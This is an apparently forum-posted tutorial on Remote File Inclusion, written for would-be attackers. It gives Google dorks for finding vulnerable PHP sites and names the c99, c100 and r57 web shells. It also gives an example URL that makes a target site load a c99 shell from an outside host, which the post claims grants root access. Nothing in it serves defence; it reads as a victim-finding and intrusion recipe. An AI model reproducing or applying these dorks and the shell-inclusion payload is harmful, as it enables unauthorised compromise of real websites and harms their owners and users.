Remote File Inclusion

RFI (Remote File Inclusion) is a type of vulnerability on websites.
It allows an attacker to include a remote file, usually through a script on the web server.
The vulnerability occurs due to the use of user-supplied input without proper validation.
RFI is a old vulnerability, so vulnerable sites are very few.
So, how find a vulnerable site ?
We can use Google Dork, for more info about google dork click here
What kind of dork we can use ?
I reccomend dork like :
inurl:index.php?page=
inurl:index.php?login=
And so on..
Now we need a shell (c100, c99, r57) that is uploaded on a server, for example http://c99.gen.tr/c99.txt
Now we have a vulnerable site and shell.
www.site.com/index.php?page= (vulnerable site)
www.site.com/index.php?page=www.c99.gen.tr/c99.txt
If we can see c99 we've root access on site.

If you have a problem or you need some explanations just write under this post!